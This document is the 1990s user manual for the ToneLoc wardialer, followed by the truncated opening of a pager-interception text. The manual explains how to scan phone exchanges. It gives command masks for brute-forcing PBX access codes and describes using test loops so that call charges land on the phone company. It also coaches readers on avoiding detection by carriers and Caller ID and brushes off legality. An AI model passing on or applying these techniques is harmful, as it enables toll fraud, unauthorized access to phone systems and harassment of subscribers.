ToneLoc v0.98 User Manual, by Minor Threat and Mucho Maas

ToneLoc v0.98

User Manual

by

Minor Threat & Mucho Maas

ToneLoc is short for Tone Locator, and is a bit of a wild thing.
What it does is simple: it dials numbers, looking for some kind of tone.
It can also look for carriers like an ordinary wardialer.

It is useful for:

1. Finding PBX’s.
2. Finding loops or milliwatt test numbers.
3. Finding dial-up long distance carriers.
4. Finding any number that gives a constant tone, or something
that your modem will recognize as one.
5. Finding carriers (other modems)
6. Hacking PBX’s.

Before you even start using ToneLoc, PLEASE PLEASE take the time to
print out and read the docs. Well, you don’t have to print them out,
but at LEAST read them. ToneLoc is extremely flexible and can be
configured to work on almost any modem under almost any environment. It
has been extensively tested on everything from generic 1200’s to USR
16.8k duals. Unfortunately, flexibility has its price. You can
probably get just about anything short of an acoustic coupler to work
with ToneLoc, but you’ll need to spend some time configuring it
properly. Trust us, reading the docs now will alert you to many useful
features, and save you headaches later. To sum it up, ToneLoc rocks and
if you don’t read the docs, you’re a LAMER!

Here are the command line options for ToneLoc:

ToneLoc [DataFile] /M:[Mask] /R:[Range] /D:[ExRange] /X:[ExMask]
/C:[Config] /S:[StartTime] /E:[EndTime] /H:[Hours] /T[-] /K[-]

You can use “:” or “-” as a delimiter. If you don’t use “:” or “-“,
ToneLoc will assume there is no delimiter. Example: ToneLoc [DataFile]
/M[Mask] …

When you run ToneLoc you need to give it at least one command line
parameter. The only required parameter is a data filename; the rest are
optional. The optional parameters can come in any order. If you only
provide a filename, the filename is also used as the mask. A mask tells
ToneLoc what numbers to dial. A mask will look something like this:
555-1XXX. The X’s are replaced by ToneLoc with random numbers. It will
never dial the same random number twice in the same mask. If you exit
before the mask has been exhausted, ToneLoc will save the array of
numbers dialed and their results in the data file. You should never
have more than 4 X’s in a mask. ToneLoc will run, but since ToneLoc
uses integer variables, the numbers will be all screwed up, since 5 X’s
would have 100,000 possible numbers which is more than 32,768 (integer)
and 65,536 (word). If you have no idea what we’re talking about, just
trust us and don’t put 5 X’s in the mask.

The next command line parameter is the Mask (/M). If you use this,
your data filename can be anything you want, and the mask will be taken
from the string following /M.

The next parameter is the range to dial (/R). This makes it easier
to specify a range of numbers without having to exclude numbers. Say
you want to dial from 835-1000 to 835-2000, you would run:
TONELOC 835-XXXX /R:1000-2000.

The next parameter is the range to NOT dial (/D). Say you want to
dial 345-xxxx, but you know that 345-9000 – 345-9999 are all payphones.
Run: TONELOC 345-XXXX /D:9000-9999. ToneLoc would dial everything
except the 9000-9999 range.

Another way to accomplish the same thing would be to use an Exclude
mask. (/X) This is a mask of numbers NOT to dial. To dial the entire
345 prefix, EXCEPT the 5000-5999 range, you could run:

TONELOC 345-XXXX /X:5XXX

Notice that is “/X:5XXX” and not “/X:345-XXXX”. The Exclude mask must be
a subset of the original mask. You can specify up to 10 exclude masks.

Excluded numbers (from masks or ranges) are only excluded for the
current run of ToneLoc – the flagging is not permanent. Between your
dial masks and ranges you should be able to obtain a good degree of
specificity in your scan.

The next command line parameter (/C) is which configuration file to
use (.CFG). This file contains all of the configuration data for ToneLoc,
such as which COM port to use, the baud rate, window colors, dial string,
etc. See the configuration file for details.

The next parameter is the starting time (/S). ToneLoc will wait
until this time to begin the dial scan. You can use either standard
time notation (5:30p) or military time (17:30) for any time parameter.
You can hit any key to start early.

The next parameter is the ending time (/E). When this time is
reached ToneLoc will end the current scan.

The next parameter is a useful shortcut (/H). It specifies an end
time at a certain number of hours and minutes past the start time. If
you specify a start time and a number of hours (/S:10:00p /H:5:30), the
end time will be the start time plus the number of hours desired (3:30
AM). If you specify both an end time and a number of hours, the number
of hours will take precedence.

The next few parameters are overrides for the scan type (/T, /K,
/T-, /K-). This is usually set in the config file, but this parameter
overrides it. To scan for tones you’d use /T. To scan for everything
except tones use /T-. To scan for carriers you’d use /K, to scan for
everything except carriers use /K-. The inverted scan modes are useful
for hacking a PBX; see below on hacking PBX’s.

The datafile should be 10016 bytes at all times. If you have data
files from previous versions of ToneLoc, there is a utility included with
ToneLoc called “TCONVERT” that will bring your data files up-to-date.
There can be as many data files in the directory as you want. Don’t
forget to SAVE your data files, they don’t take too much space, and they
are great with ToneMap (see below).

Here are a few example command lines:

ToneLoc 346-XXXX – Dial 346-0000 to 346-9999 using the
default configuration file, saving
responses to the data file 346-XXXX.DAT.

ToneLoc 950-5XXX /C:NINE5 – Dial 1000 numbers, from 950-5000 to 950-5999
(randomly), and use the configuration file
NINE5.CFG. This configuration file might
skip rings and have a short wait. This
could be used for dialups.

ToneLoc 474-9XXX /X:1XX – Dial 1000 numbers, from 474-9000 to 474-9999
(randomly), using the default configuration
file TONELOC.CFG, but exclude 474-9100 to
474-9199. Also see next example.

ToneLoc 474-XXXX /R:9000-9999 /X:91XX
– Same as above, but easier to understand.
This method is better for another reason:
If you scan 9000-9999 now, and later decide
to scan the rest of the prefix, this method
would keep the whole scan in one data file,
rather than having 474-9XXX.DAT and
474-XXXX.DAT.

ToneLoc 474-XXXX /R:9000-9999 /D:9100-9199
– Another version of the above.

ToneLoc 836-99XX /C:LOOP /S:21:30
– Dial from 836-9900 to 836-9999 (100 numbers)
using the config file LOOP.CFG, but waiting
until 9:30 PM to begin dialing.

ToneLoc TEST /M555-1XXX /H:5:00 /x:3XX /x:1XX
– Dial the numbers from 555-1000 to 555-1999
for five hours maximum, saving the dialed
numbers to TEST.DAT, and excluding the
ranges 1300-1399 and 1100-1199.

ToneLoc 677-8xxx /E:8:30a – Dial the numbers 677-8000 to 677-8999
until 8:30 AM, saving the dialed numbers
to 677-8XXX.DAT.

The optional parameters can come in any order, but the name of the
datafile MUST be the first parameter. If there is no mask specified, the
data file name is used as the mask.

We hope you are impressed by the way the screen looks while dialing.
The screen is split up into 3 major windows. The first window, called the
Activity Log, takes up the entire left half of the screen. It tells you
what is going on. If LOGGING is ON, everything that appears here also
goes to the log file. The following messages may appear in the message
log:

22:54:09 ¯
This is written at the beginning of each run. It makes it
easier for you to separate ToneLoc runs in the log file.

22:53:53 ToneLoc started on 31-Jan-93
This is self explanatory.

22:53:53 Data file: 403-XXXX.DAT
This shows which file ToneLoc is using to store the dialed
numbers.

22:53:53 Config file: TONELOC.CFG
This shows which file ToneLoc has loaded the configuration
information from. TONELOC.CFG is the default configuration
file.

22:53:53 Log file: TONE.LOG
This shows which file ToneLoc is logging the scan to. This
file name is set in the configuration file and can be changed
there.

22:53:53 Mask used: 403-XXXX
This tells what mask you used for the current run.

22:53:53 Exclude mask 1: 8XXX
Shows which numbers you AREN’T dialing in the current run.

22:53:53 Initializing modem …
ToneLoc is trying to initialize the modem. It will either
give a “Done” message or a “Failed” Message. Toneloc will
try 3 times to initialize the modem.

22:53:53 Waiting until 09:30:00
ToneLoc is waiting until 9:30 AM to start the current scan.
You can hit any key to start early.

23:30:44 474-5294 – Timeout (1)
This means the number was dialed, it rang ONCE (notice the ‘(1)’ ),
and then it timed out without finding anything.

23:30:56 474-5335 – Timeout (3)
This means the number was dialed, and nothing was found during
the WaitDelay. The (3) indicates there were three rings.

23:31:00 474-5978 – No Dialtone #1
This means when ToneLoc tried to dial, there was no dial tone
found (your dialtone). When this happens, ToneLoc tries the
same number again, until it has tried the number of times by
specified by NoToneAbort in the config file.

23:39:02 474-5685 – Busy
This means the number dialed was busy.

00:24:26 474-5989 – ** TONE **
Holy Shit! You found a tone. It is probably either a loop,
PBX, or dial-up LD carrier. Now its your job to hack it out
and use it!

09:14:34 353-0911 – * CARRIER *
Even better! You found a carrier. If you’re lucky, it’s
your DATAKIT dialup. Otherwise, it could be a BellCore
unix! Of course it could be a do-nothing carrier. Those suck.

00:24:26 474-5489 – Voice (1)
This means your modem detected a voice answer. Good modems
like the USR HST/DS can detect voice. X5 or X6 in your init
string will enable this on a HST/DS. CAUTION: the “VOICE”
response can be triggered by some dialtones, so you may want
to disable this if you are scanning for tones. See below.

06:45:43 Ringout (3)
This means MaxRings (in this case 3) was reached and the dial
was aborted. See below for a discussion of rings.

15:11:23 474-5555 – * Blacklisted #5 *
This means the number was found in the BlackList file
(the 5th entry), so it was not dialed. This is highly
recommended for areas with Caller ID and ex-girlfriends.

00:45:01 Autosaving
This means Toneloc is backing up the .DAT file after the
interval set in the config file.

04:53:12 Stopping at 10:00:21
ToneLoc has reached the stop time specified after /E and is
exiting the current scan.

03:00:32 All 10000 codes exhausted
Damn, you dialed every possible number! 3 X’s means 1000
numbers are possible. 4 X’s means 10,000 numbers are
possible, etc. Like this: 10^X, where X is the number of X’s
in the mask. Math sucks.

Other messages are in response to input:

00:25:31 474-5629 – Speaker ON
By hitting S you can toggle the speaker on and off DURING a
scan. ToneLoc will beep high (ON) or low (OFF) depending on
the status of the speaker. ToneLoc waits until it is finished
with the current dial to toggle the speaker.

00:28:45 474-9091 – Volume set to 3
By hitting a number 0-9 you can set the volume level with the
commands defined in the Config file. You can also use them for
customized commands.

00:25:59 474-5985 – * Noted *
You can hit N to make a note in the log next to this number.
Aborts current number. Use it when you find something
interesting like a drunk cowboy yelling at you through the
phone. Other note keys are:
C – Carrier
F – Fax
G – Girl
K – Custom note (you can type a note yourself)
V – VMB
Y – Yelling asshole

00:27:23 474-5239 – Jumped to DOS
Hit J to shell to DOS. Just type EXIT to return. This will
abort the current number being dialed, but ToneLoc will redial
it after you return from DOS. Be careful to “exit” and not
to just re-run Toneloc.

00:27:45 474-5722 – Redialing
Hit R to redial the current number. Useful if a number doesn’t
“take” or you want to fuck with that drunk cowboy who answered
last time.

00:30:45 474-5123 – Escaped
03:30:45 Dials/hour : 225
00:30:46 ToneLoc Exiting …
Hitting escape will abort the current number and exit the
program. ToneLoc writes the average number of dials per hour
to the log file.

00:28:12 474-5756 – Aborted
Hitting the Spacebar will abort the current number.

00:45:23 454-5365 – Paused
Pressing P will stop the current dial and wait for another
keypress before continuing. Good in case you want to use
the phone for a sec.

A few keys don’t have screen responses:

X : Adds 5 seconds to the WaitDelay time for this dial only. Can be
used repeatedly on the same dial.

Ok, on to the next window. The top-right corner of your screen is
the modem window. Everything that is returned from your modem is shown
here. This isn’t very useful, except maybe for debugging, but it looks
neat.
The last window is in the bottom-right part of the screen. Its
called the Statistics window. It shows a bunch of cool stuff like….

þ The time you began scanning.
þ The current time.
þ The maximum number of possible numbers,
based on your mask and negative mask.
þ The number of numbers already dialed.
þ Number of responses for CD (carriers), Tone, Voice, Busy, & Ringout.
þ The average number of dials per hour.
þ ETA – Estimated Time to Arrival (or completion).
This is the number of hours and minutes left in the scan, based
on your current dials per hour and numbers left.
þ The number of rings so far in the current dial.
þ Last 5 tones or carriers found.

You’ll also notice (you better!) the meter at the bottom right.
Pretty cool huh? It just shows the progress of the current call. This
is a graphic representation of the elapsed wait time as set in the config
file. If you can’t stand to look at a still screen, set a fancy meter
wipe option in the config file.

The Black List File:
——————–

This is a file of up to 1000 numbers that ToneLoc should never dial.
Put your own numbers here, your friends numbers, the police department,
fire department, etc. Each number should be on its own line exactly as
ToneLoc will dial them. For example the entry “555-1212” will only
blacklist the number “555-1212”, not “1-555-1212” or “5551212”. If
ToneLoc comes up with one of these numbers as a candidate for a dial
attempt, it will skip it and move on to the next number. Anything after
a semicolon (;) is ignored, so you can comment this file.

Rings And The X Parameter:
————————–

This discussion refers in particular to newer USRobotics modems. If
you are using another brand of modem you’ll probably have to sort
through the details yourself.

This can get a little confusing so a little detail is in order.
There are several ways to deal with the RINGING message that your modem
can generate. The simplest is to simply disable it with the X4 command
in your modem init string. With X4, RINGING and VOICE will be supressed
as responses. This is simple enough, but you won’t get much diagnostic
detail in your logs or .DAT files, and your scan will take longer
because more of the calls will go all the way until timeout instead of
aborting earlier because of a Ringout or Voice response. You can enable
these messages with the X6 flag, which will respond with VOICE and
RINGING when it is detected. Unfortunately, the USR is no AppleCat, and
VOICE can give a false response when you are looking for dialtones. Of
particular importance, the high pitched tone (2600hz aka wink-start)
which precedes many PBX’s initial dialtone will cause a VOICE response.

X7 supresses the VOICE response, but leaves the RINGING response.
In our experience RINGING is seldom a false response, and any potential
VOICE responses will show up as BUSY’s. If you decide to use X7, you’ll
need to adjust the MaxRings parameter in your config file. Experiment a
little bit to decide how to set it. If you set it to 0, the number of
rings will be recorded, but ToneLoc will never abort because of rings.

If you are using a USRobotics modem to scan for carriers, however,
you should use the X6 command since the modem will never give a false
response when looking for carriers. Your scan will go faster, and your
.DAT file will be more detailed.

After the Scan:
—————

Well now that I have some dial tones, what the fuck do I do with
them? First, figure out what kind of a number it is.

PBX’s usually have a 3-8 digit code, but they can be longer, or they
can have NO code. If you enter the correct code, you will hear a second
dial tone. Otherwise you will probably get a reorder (fast busy), busy,
a hangup, or ringing. Sometimes it will ring the PBX attendant (the
operator – ugh). But ringing the attendant is a good way to find out
who owns the PBX. Once you get the second dialtone, dial 9+ACN (sometimes
X+ACN, where X is often 7 or 8, and less frequently other digits) to make
a long distance call. (NOTE: ACN = Area Code & Number) Some PBX’s have
no code, you just need to dial 9. Sometimes the code will follow the
number in the format 9+ACN+Code. Sometimes you’ll need to dial 1 first.
Many will also call international. Experiment. See below on hacking them.

It might also be a long-distance extender dial-up. You’ll find many
of them in the prefix 950-xxxx. Sometimes it is easy to hack a code, but
please be careful! They are easy to get busted on. MCI people are dicks.
They get off on busting people, and announcing it to the world. Sprint
doesn’t fuck around either, they’ll bust you, but they like to keep it
quiet. And the little guys are getting smarter too. Consult with
local phreaks before experimenting with an unfamiliar extender.

Here’s a tip. If you scan 950’s you’ll find most will give either a
result of Voice, Ring, or Busy. A few will be Tones, but also a few will
be Timeouts. Investigate these – you may find something interesting,
like a voice-prompted dialup or a modem carrier.

You may also find “Phantoms”. In Mucho’s area there are several MCI
dialup ports that are no longer in use since the full implementation of
Equal Access. Hack all day, you won’t find a code. Try and figure out
what you are hacking before you waste time on a dead end.

Now, for an explanation of loops. We’ll tell you what we know about
them, which ain’t a whole lot. Loops are a pair of phone numbers,
usually consecutive, like 836-9998 and 836-9999. They are used by the
phone company for testing. What good do loops do us? Well, they are
cool in a few ways. Here is a simple use of loops. Each loop has two
ends, a ‘high’ end, and a ‘low’ end. One end gives a (usually) constant,
loud tone when it is called. The other end is silent. Loops don’t usually
ring either. When BOTH ends are called, the people that called each end
can talk through the loop. Some loops are voice filtered and won’t pass
anything but a constant tone; these aren’t much use to you. Here’s what
you can use working loops for: billing phone calls! First, call the end
that gives the loud tone. Then if the operator or someone calls the other
end, the tone will go quiet. Act like the phone just rang and you answered
it … say “Hello”, “Allo”, “Chow”, “Yo”, or what the fuck ever. The
operator thinks that she just called you, and that’s it! Now the phone
bill will go to the loop, and your local RBOC will get the bill! Use this
technique in moderation, or the loop may go down. Loops are probably most
useful when you want to talk to someone to whom you don’t want to give
your phone number.

As for carriers.. well, we would hope you know what to do with a
carrier by now. But if you don’t, a good place to start is The Mentor’s
Guide to Hacking (Phrack, I forget which issue).

ToneMap – Something New
————————

When we first wrote and ran ToneMap, we were amazed by what we saw.
ToneMap reads a ToneLoc .DAT file, and displays the data visually on the
screen. Big deal, right? Actually, it can be useful. We saw more than
just scattered colors. We saw definate patterns within the prefixes we
scanned. Hopefully you took the time to print this doc file out, because
We are going to go over one of the example .DAT files with you.

Run ToneMap like this: “TONEMAP 555-XXXX” and press Enter. (You’ll
need VGA). You should see a square of colors that takes about 2/3 of the
screen, and a key to the colors on the right. Each square represents a
response type of a single phone number in the prefix. It starts at the top
left (0000) and works down and to the right (9999). Each vertical column
is 100 numbers.

Here’s an explanation of the colors:

BLACK = Undialed (Not yet dialed by ToneLoc)
GREY = Timeout (Lighter = more rings before timeout)
ORANGE/RED = Busy number.
DARK BLUE = Blacklisted number.
DARK GREEN = RingOut. (Rang too many times)
LIGHT GREEN = Tone
LIGHT YELLOW = Carrier
CYAN = NOTED Number (‘N’ was pressed)
DARK RED = Aborted (spacebar pressed)

There are other colors too, as you can see in the key, but the ones
above are the important ones. Unless you’re colorblind, you have
probably already noticed a pattern to this prefix. There are some
vertical bands in the middle of the prefix (from about 3900-5900). In
fact, one entire column (3900) is all busy numbers. Use the cursor keys
to move the white cursor around the map. The number on the bottom right
corner will change and you’ll see the result type and color for that
number.

You can get a little or a lot from a .DAT map. If the exchange is
a rural or residential one you’ll probably see an even distribution of
result codes, with a certain level of each major result code. Besides a
different number of timeouts, ringouts, or busys, most residential
exchanges look very similar – an even distribution with no pattern.

In a business exchange you are much more likely to find patterns.
You may find a string or cluster of modems, a large range of similar
timeouts or voice responses, etc. Ranges that are busy (like the 3900
column in our example) could be permanently busy, or some message which
the modem detects as a busy. A series of ringouts could indicate part
of a PBX’s DID (Direct Inward Dial) group. It varies widely, and your
best bet is to always check it out manually – you never know what you’ll
find.

It behooves you to scan your prefixes and study your results. It
is best to scan a prefix in one big scan (555-xxxx rather than 555-0xxx,
555-1xxx, etc) so you can see the whole prefix at once. We would love
to have a look at your results and have a look at your .DAT files – try
to get in touch with us! Who knows … maybe your ToneMap will end
up on a T-shirt someday!

Hacking PBX’s:
————–

If the PBX code is 4 digits or less you can use ToneLoc to hack it.
The simplest way is to use ToneLoc to look for an internal dialtone.
Lets say you found a 3 digit PBX at 555-9999 which hangs up on you after
you enter a bad code. You’d use ToneLoc like this:

ToneLoc Example1 /m:555-9999Wxxx

(EXAMPLE1.DAT will be the .dat file, /m: specifies the mask.)

This will produce dialing strings like this: ATDT 555-9999Wxxx W;
ToneLoc will dial the number, wait for a dialtone, try a code, then wait
for a second dialtone. If you get the right code, you’ll get the second
dialtone, otherwise you’ll just get a timeout.

Some PBX’s have alert tones for invalid codes which the W command
will hear as a dialtone. You can’t look for a second dialtone directly
with the W command on these PBX’s, but Toneloc has a scan mode designed
specifically for this problem. Set the scan mode to look for everything
except tones, either in the config file or on the command line, and use
ToneLoc like this:

ToneLoc example2 /m:555-8999WxxxW1

This will produce dialing strings like this: ATDT 555-8999WxxxW1 W;.
Toneloc will dial the number, wait for the first dialtone, dial the
code, wait for a dialtone, dial 1, then wait for a dialtone. If the
code is invalid, the second W command will hear the alert tones as a
dialtone and dial 1. The tones should keep playing, and the third W
will respond to the alert tones too, giving a final response of Tone.
If the code is valid, the second W command will hear the internal
dialtone and the 1 will immediately quiet it since 1xx or 1xxx is a
valid extension on most PBX’s. This would give a final response of
Timeout since the third W command won’t find a tone – and voila, you
have your code. Are you confused yet?

This method might not work if 1xx or 1xxx isn’t a valid extension
on the PBX you are trying to hack, since some PBX’s will immediately
give an alert tone if you dial the first digit of an invalid extension.
If you fail the first time around, and think you might have this
problem, have a look at the phone number for the PBX indial. For
example, if the PBX indial is 555-4321, it’s a good bet that some valid
DID extensions are in or near 4xxx, 3xx, or 2x. Therefore, 4, 3 or 2 is
probably going to be the first digit of a valid extension, making them
good candidates for your terminal digit.

Apparently some PBX’s will respond with a carrier blast to an
invalid code, although we’ve never found one. You can use the
everything-but-a-carrier scan mode for these, or just look for an
internal dialtone if carriers don’t appear as tones to the W command.
(See Dual Scanning).

Cautions & Usage Notes:
———————–

We do not have personal experience scanning 1-800 exchanges with
ToneLoc but we recommend that you exercise caution. For a classic
example, see the Fall 1992 issue of 2600 magazine. There is a letter
in there that Minor Threat received once after dialing about 100
1-800 numbers by HAND sequentially! First of all, if you are are
looking for tones you may not get much. Many of the PBX’s or extenders
you would be looking for will answer with a short tone, about the length
of a ring. That’s how ToneLoc will perceive those tones – as a ring.
Many of the PBX’s may also answer with silence, and need # or 9 to
activate their tone. Local PBX’s can answer like this as well, however
the 800 exchanges are more likely to have better security since they
are under constant pressure from call-sell operations as well as every
code abuser in the nation. Second, MCI and Sprint can get irritated when
someone makes thousands of calls into their 800 exchange, and, unlike a
local number, they WILL have easy access to at least your area code and
exchange, and probably your entire phone number. Since each 800 call
costs somebody money, and you aren’t conducting legitimate business during
these calls, it might also be considered theft of service.

Hacking an 800 system of any kind, be it a computer, long distance
extender, PBX, or even a VMB system, can be extremely risky. We urge you
to use good judgment. Find a local PBX and divert your call through it.

If you live in an area with the Call Return, Call Trace, or
Caller ID active, you will definitely experience some call returns with
ToneLoc. Politely explain to anyone who calls back that you dialed a
wrong number – don’t provoke them into a Call Trace. Who knows, you
may even meet a fellow hacker (It’s happened to us – TWICE!). If Caller
ID is active, use more caution – they could have your phone number and
scanning could be construed as harrassment, especially if it happens at
3:00 am.

In any case, please use some intelligence if you are scanning a
range that belongs to a large company. Often the same operator will have
to answer dozens of incoming phone numbers, and your strange hangups may
get tiresome enough in the course of the day that he or she might decide
to do something about it. Listen in on ToneLoc to figure out what kind
of an exchange you are scanning. If it is principally a business exchange,
consider only scanning at night when the affected businesses are closed.
If it is mostly residential you might want to scan during the day. Make
intelligent use of the exclude mask to eliminate ranges that will most
likely be unproductive – unused ranges, pager numbers, answering services,
cellular phones, etc. If you want an overview of your local exchanges,
first try the yellow pages. You will quickly discover where promising
exchanges are. If you want greater depth, go to your local public library
and ask at the reference desk for the criss-cross directory. A section
of this directory is a listing of the telephone numbers in an exchange.
It does not list unlisted or nonpublished numbers (PBX’s will not show up,
although the PBX billing number might), but it will show you if the
exchange is a residential one or not. Ten minutes of thought can save
you 50 hours of scanning.

When hacking a PBX, have some sense and do it late at night when
nobody is using the PBX. Have a little patience; you’ll be glad you did.
Make sure you hack RANDOMLY – sequential hacking is always a good
way to get noticed (although it probably won’t make a difference in this
case), and besides ToneLoc has a better chance of finding the code sooner.

Is Scanning Illegal? (Who cares)
——————–

We don’t know. We’ve heard it is legal to scan during business
hours when the call would not be harrasment. We’ve heard it’s not
illegal if you only call once. We’ve heard that scanning with intent to
hack is illegal, as if such a thing could be proven. (Some people
suggest not using the same phone line for hacking and scanning).
Remember, the most important thing is not whether it is illegal, but
whether you piss someone off or attract attention.

Here’s what the staff at 2600 magazine have to say about wardialing:

“In some places, scanning has been made illegal. It would be hard,
though, for someone to file a complaint against you for scanning since
the whole purpose is to call every number once and only once. It’s not
likely to be thought of as harassment by anyone who gets a single phone
call from a scanning computer. Some central offices have been known to
react strangely when people start scanning. Sometimes you’re unable to
get a dialtone for hours after you start scanning. But there is no
uniform policy. The best thing to do is to first find out if you’ve got
some crazy law saying you can’t do it. If, as is likely, there is no
such law, the only way to find out what happens is to give it a try.”
[2600, Spring 1990, Page 27.]

Problems? (Or; Why doesn’t Toneloc work with my modem?)
———

ToneLoc’s tone scanning mode may not work for everyone’s modem.
ToneLoc looks for tones by dialing strings like this: “ATDT 555-1234 W;”.
This tells the modem to dial the number 555-1234, wait for dialtone, and
then return to the command line. ToneLoc then waits for a result code.
If it gets Ringing, Voice, Busy, etc. it moves on to the next number.
If it gets nothing, the modem never heard a dialtone, so ToneLoc hangs
up and moves on – this is a timeout. If it gets “OK” as a result code
the modem has heard a tone (W waits for a dialtone) and returned to
the command line (semicolon (;) returns to the command line).

ToneLoc won’t work if your modem isn’t discriminative. Some cheap
modems “detect” dial tones just fine, but they also “detect” everything
else – rings, busys, even silence. Other modems won’t wait long enough,
and will move from W to ; very quickly. If you have a problem that
doesn’t stem from either of these, let us know and we’ll see what we can
do to help.

Dual Scanning:
————–

For a long time now we have been asked if it was possible to scan for
tones and carriers at the same time. At last, we have found a way.

The USR Courier 2400 was a great modem in it’s time, and it is the best
modem we have found for scanning. The Courier 2400 has several unique
features. First, it detects carriers as tones. This means a tone scan
should pick up both carriers and tones, and a good number of falses.
This works fine, but it’s a pain to manually sort out the carriers from
the many false responses you inevitably get when scanning for tones.

Recently, however, we discovered that the Courier 2400 will give a “NO
CARRIER” in response to a dialtone during a carrier scan. If you set your
ToneResponse to NO CARRIER in your config file, and scan for carriers,
you will pick up all the carriers and tones separately, on one pass!

There’s a good chance other modems may behave similarly. Try it with
your modem and see. If you find one that works well, tell us about it
and we’ll include a note in the next version of Toneloc. If not, you
should be able to pick up a used Courier 2400 for cheap.

Credits:
——–

We hope you find this program useful. Give it to anyone and
everyone who deserves to have it. If you think it is very cool and
useful, try to contact us somehow. If you think it is a piece of shit
and the directions totally misguided, try to contact us anyway. Our
handles are Minor Threat and Mucho Maas. Minor Threat can be reached on
CelerityNet, our internet address , or IRC.
Mucho Maas can be reached at the internet address as well.

ToneLoc is written in C and assembly. Assembled by Turbo
Assembler, and compiled by Borland C++ 3.1. Window routines are from
CXL v5.2. The built-in SERIAL routines are based on code from an
excellent book : “Serial Communications in C and C++” by Mark Goodwin.

Minor Threat Sez:

Thanks to Alexis Machine and Marko Ramius for getting me started
phreaking. Thanks to our beta testers, and thanks Alexander Bell for
inventing the telephone. I know he had us in mind.

Mucho Maas Sez:

Thanks to Minor Threat for helping me work on ToneLoc. It should be
noted that the lion’s share of the programming was done by him, and that
his code is a hell of a lot cleaner than mine. Still, somebody had to
get Threat off his ass, and give him features to re-write. Credit for
the PBX hacking technique described here goes to an old text file by Steve
Dahl.

——————————————————————————
One last quote: from a newspaper editorial in the 1870’s

‘… carrying human voice over copper wires is impossible, and even if
it was possible, the thing would have no practical use.’

HA!

Pager, Fax, and Data Intercept Techniques, by The High Tech Hoods

The High Tech Hoods Presents...

               *&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*
               *                                           *
               * PAGER, FAX, AND DATA INTERCEPT TECHNIQUES *
               *                                           *
               *&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*

One can only imagine the intemal trauma of being a paging company owner-it
would be sort of like owning a company that made lime glass vials, hell,
business has just suddenly shot through the roof over the last few years
making enormous profits for everyone lucky enough to be in the business of
manufacturing little glass vials, but sometimes, late at night, the owners
must wonder exactly why people are buying millions of little glass vials... So
it goes with pagers, the popularity of the common pager has exploded
concurrently with the drug trade. Pagers are so popular that in America 7.2%
of the entlre population carries a pager. In the good old days, wearing a pager
meant you were a doctor or maybe a car thief, but certainly nothing more
disreputable than that. Today doctors, and let's face it, even car thieves,
like to hide their pagers under jackets or tend towards those new little
pagers that masquer- ade as ballpoint pens so people don't assume they're drug
dealers. At this writing, one state (Virginia) actually has a law prohibiting
pager use on school grounds and several other states have tried to pass bills
(unsuccessfully) de- manding licensing of pagerized individuals.

Not to say that pager companies don't have some kind of conscience, they do.
In fact, have formed a group known as TELOCATOR, the Mobile Communications
Industry Association. Telocator promotes paging/police cooperation and
attempts to keep their individual members informed on the latest laws and
procedures as they apply to pagers. However, to be frank, their primary
success seems to be cute little stickers they say "MOBILEized" for the war on
drugs for pager companies to stick on their doors along with nice little
laser-written posters that remind perspective pager renters that the "use of a
pager in a commission of a felony is prohibited by federal law and carries a
penalty of up to four years imprisonment and/or a fine of up to $30,000 for
each offense.

  One can only wonder exactly how effective these efforts are in shaping the
morals of the pager industry, especially since the subscriber base is expected
to continue growing and is estimated to reach 21 million users by the
mid-1990's. Pagers operate in the clear on radio frequen- cies that can be
received with any standard receiver or a scanner. The information trans-
mitted on pagers can be of interest to anyone from law enforcement to business
competitor groups. There are several interesting ways of extracting said
information.

TYPES OF PAGERS
Although numeric display pagers constitute more than half of the pagers in use
today other types are also in use. Here's a list ordered by popularity:

NUMERIC DISPLAY_ This service lets one receive numbers sent from any
touch-tone telephone. The pager beeps and shows tele- phone numbers,
previously agreed-upon codes, parts numbers, stock prices, purchase orders,
and so on. Limited information may be sent along in the form of numbers that
stand for initials, or simple codes.

TONE_ The tone pager emits a beep telling the user to call back a
predetermined location such as an office, home, voice mailbox, or telephone
answering machine.

TONE AND VOICE_ This paging service gives an audible tone
followed by the message in the caller's own voice. There is no operator, and
no need for the user to call in. The pager delivers the complete message.

ALPHANUMERIC DISPLAY_ This latest develop- ment is actually a miniature
message center that beeps and displays messages in words and numbers. Messages
are sent through an input device or dispatched by a live operator.

PRIVACY LAWS AND PAGERS For each type of pager, different legal require- ments
must be met for intercepts. On the federal level, the easiest pager to deal
with is the simple tone-only device. The U.S. Justice Department had long held
that interception of a tone-only pager was not a search, since there is no
expectation of privacy in a device that only beeps or vibrates. Therefore, the
Depart- ment has maintained, interceptions raise no Fourth Amendment issues
and require neither a warrant nor a court order. This policy was certified by
Congress when it passed the Electronic Communications Privacy Act of 1986
(ECPA), which excludes tone-only pagers from its provisions. Although the
information conveyed by intercepting a tone-only pager is limited, such
intercepts can be helpful in documenting patterns of behavior by suspected
criminals. Since they are the cheapest and easiest to use of all pagers,
tone-only units may be most commonly encountered in connection with drug
activity, at least among lower echelon criminals. Federal and state laws treat
privacy interests in display and tone-and-voice paging commu- nications. Under
ECPA, for example, the police generally cannot intercept a tone and voice or a
display pager without first securing an appro- priate court order. This
restriction stems from Congress' conclusion that subscribers using such pagers
have a reasonable expectation of privacy in the paging communications they
send and receive. A similar conclusion is also reflected in state privacy
statutes, which often impose stricter requirements on carriers and law
enforcement officials than does the ECPA. As requirements for legal
protections increase, so do the rewards for intercepting display pagers. A
numeric display pager dis- plays a 10- or 12-digit number, usually the phone
number of a person who desires a retum call. More sophisticated drug dealers,
however, use the digits as code, with, for example, a "1" at the end of a
phone number meaning "the cocaine is not in."

  Obviously, police and others intercepting such messages with monitoring
devices or cloned pagers can har~est considerable worth- while information.
The recent increase in the use of alphanu- meric paging is beneficial to law
enforcement due to the added bonus of text messages. Theoretically, exact
details of drug transactions could be made available to law enforcement if the
deal was conducted via alpha paging and an intercept was in progress. There
are several ways in which paging carriers aid law enforcement in preventing
illegal use of pagers for drug transactions including leasing pagers which are
cloned to police, assisting in intercepts of paging commu- nications and
providing the police with infor- mation about paging subscribers. Federal and
state privacy statutes, however, generally require law enforcement agencies to
secure appropriate authorization before enlist- ing the aid of paging
carriers. Specifically, most privacy laws prevent the police from using a
cloned pager or intercepting a paging commu- nication unless they have first
obtained a court order, a special emergehcy request or the subscriber's
consent. Similarly, law enforce- ment agencies may not gain access to informa-
tion about paging subscribers (such as transac- tional records) unless they
secure either a subpoena, a warrant, a court order, or the consent of the
customer.

INTERCEPTIONS AN OVERVIEW
Successful pager interception is dependent
